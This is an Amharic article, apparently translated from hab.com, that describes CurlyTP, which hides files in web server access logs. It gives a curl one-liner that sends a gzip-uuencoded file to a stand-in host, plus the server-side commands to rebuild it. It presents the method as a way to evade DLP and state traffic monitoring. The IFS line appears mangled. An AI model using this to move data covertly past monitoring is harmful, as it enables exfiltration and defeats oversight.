በዊኪፔዲያ ትርጉም መሰረት የሞተ ጠብታ ሚስጥራዊ ቦታን በሚጠቀሙ ሰዎች መካከል መረጃን ወይም አንዳንድ ነገሮችን ለመለዋወጥ የሚያገለግል ሴራ መሳሪያ ነው። ሀሳቡ ሰዎች በጭራሽ አይገናኙም - ግን አሁንም የአሠራር ደህንነትን ለመጠበቅ መረጃ ይለዋወጣሉ።

የተደበቀበት ቦታ ትኩረትን መሳብ የለበትም. ስለዚህ, ከመስመር ውጭ ባለው ዓለም ውስጥ ብዙውን ጊዜ ብልህ የሆኑ ነገሮችን ይጠቀማሉ: በግድግዳው ላይ የተንጣለለ ጡብ, የቤተመፃህፍት መጽሐፍ ወይም በዛፍ ውስጥ ባዶ.

በይነመረቡ ላይ ብዙ ምስጠራ እና ስም የማውጣት መሳሪያዎች አሉ ነገርግን እነዚህን መሳሪያዎች የመጠቀም እውነታ ትኩረትን ይስባል። በተጨማሪም፣ በድርጅት ወይም በመንግስት ደረጃ ሊታገዱ ይችላሉ። ምን ለማድረግ?

ገንቢ Ryan Flowers አንድ አስደሳች አማራጭ አቅርቧል - ማንኛውንም የድር አገልጋይ እንደ መደበቂያ ቦታ ይጠቀሙ. ስለሱ ካሰቡ የድር አገልጋይ ምን ያደርጋል? ጥያቄዎችን ይቀበላል፣ ፋይሎችን ያወጣል እና ምዝግብ ማስታወሻዎችን ይጽፋል። እና ሁሉንም ጥያቄዎች ይመዘግባል ፣ የተሳሳቱ እንኳን!

ማንኛውም የድር አገልጋይ በምዝግብ ማስታወሻው ውስጥ ማንኛውንም መልእክት እንዲያስቀምጡ ይፈቅድልዎታል ። አበቦች ይህንን እንዴት እንደሚጠቀሙበት አስበው ነበር.

እሱ ይህንን አማራጭ ያቀርባል-

1. የጽሑፍ ፋይል ውሰድ (ሚስጥራዊ መልእክት) እና ሃሽ (md5sum) አስላ።
2. ኢንኮድ እናደርጋለን (gzip+uuencode)።
3. ሆን ብለን የተሳሳተ የአገልጋዩን ጥያቄ ተጠቅመን ወደ ምዝግብ ማስታወሻ እንጽፋለን።

Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh

አንድን ፋይል ለማንበብ እነዚህን ስራዎች በተገላቢጦሽ ቅደም ተከተል ማከናወን ያስፈልግዎታል፡ ፋይሉን መፍታት እና ዚፕ ይክፈቱ፣ ሃሽ (hash) በተከፈቱ ቻናሎች ላይ በደህና ሊተላለፍ ይችላል።

ክፍተቶች በ ተተክተዋል =+=በአድራሻው ውስጥ ምንም ክፍተቶች እንዳይኖሩ. ጸሃፊው CurlyTP ብሎ የጠራው ፕሮግራም እንደ ኢሜል አባሪዎች ያሉ ቤዝ64 ኢንኮዲንግ ይጠቀማል። ጥያቄው የቀረበው በቁልፍ ቃል ነው። ?transfer?ተቀባዩ በቀላሉ በምዝግብ ማስታወሻዎች ውስጥ እንዲያገኘው.

በዚህ ጉዳይ ላይ በምዝግብ ማስታወሻዎች ውስጥ ምን እናያለን?

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

ቀደም ሲል እንደተገለፀው ሚስጥራዊ መልእክት ለመቀበል በተቃራኒው ቅደም ተከተል ማከናወን ያስፈልግዎታል

Remote machine

[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue

[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g

ሂደቱ በራስ-ሰር ለመስራት ቀላል ነው። Md5sum ይዛመዳል፣ እና የፋይሉ ይዘት ሁሉም ነገር በትክክል መፈታቱን ያረጋግጣል።

ዘዴው በጣም ቀላል ነው. "የዚህ መልመጃ ዋና ነጥብ ፋይሎች በንፁህ ትንንሽ የድር ጥያቄዎች ሊተላለፉ እንደሚችሉ ማረጋገጥ ብቻ ነው፣ እና በማንኛውም የድር አገልጋይ ላይ በግልፅ የፅሁፍ ምዝግብ ማስታወሻዎች ይሰራል። በመሰረቱ፣ እያንዳንዱ የድር አገልጋይ መደበቂያ ቦታ ነው!” በማለት አበቦች ጽፈዋል።

እርግጥ ነው, ዘዴው የሚሰራው ተቀባዩ የአገልጋይ ምዝግብ ማስታወሻዎችን ማግኘት ሲችል ብቻ ነው. ግን እንደዚህ ዓይነቱ መዳረሻ ለምሳሌ በብዙ አስተናጋጆች ይሰጣል።

እንዴት መጠቀም ይቻላል?

Ryan Flowers እሱ የኢንፎርሜሽን ደህንነት ኤክስፐርት እንዳልሆነ እና ለCurlyTP ጥቅም ላይ የሚውሉትን ዝርዝር አያጠናቅርም ብሏል። ለእሱ, በየቀኑ የምናያቸው የተለመዱ መሳሪያዎች ባልተለመደ መንገድ ጥቅም ላይ ሊውሉ እንደሚችሉ የፅንሰ-ሃሳብ ማረጋገጫ ብቻ ነው.

እንደ እውነቱ ከሆነ ይህ ዘዴ ከሌሎች አገልጋይ "ይደብቃል" ከሚለው ይልቅ በርካታ ጥቅሞች አሉት ዲጂታል ሙት ጠብታ ወይም PirateBox: በአገልጋዩ በኩል ልዩ ውቅር ወይም ልዩ ፕሮቶኮሎችን አይፈልግም - እና ትራፊክን በሚቆጣጠሩት ሰዎች መካከል ጥርጣሬን አይፈጥርም. የSORM ወይም DLP ስርዓት ዩአርኤሎችን ለተጨመቁ የጽሑፍ ፋይሎች መቃኘት የማይቻል ነው።

ይህ በአገልግሎት ፋይሎች ውስጥ መልዕክቶችን ለማስተላለፍ መንገዶች አንዱ ነው. አንዳንድ የላቁ ኩባንያዎች እንዴት እንደሚያስቀምጡ ማስታወስ ይችላሉ የገንቢ ስራዎች በ HTTP ራስጌዎች ውስጥ ወይም በኤችቲኤምኤል ገጾች ኮድ ውስጥ።

ሀሳቡ ይህን የትንሳኤ እንቁላል የሚያዩት የድር ገንቢዎች ብቻ ነበሩ፣ ምክንያቱም መደበኛ ሰው የራስጌዎቹን ወይም የኤችቲኤምኤል ኮድን ስለማይመለከት።

ምንጭ: hab.com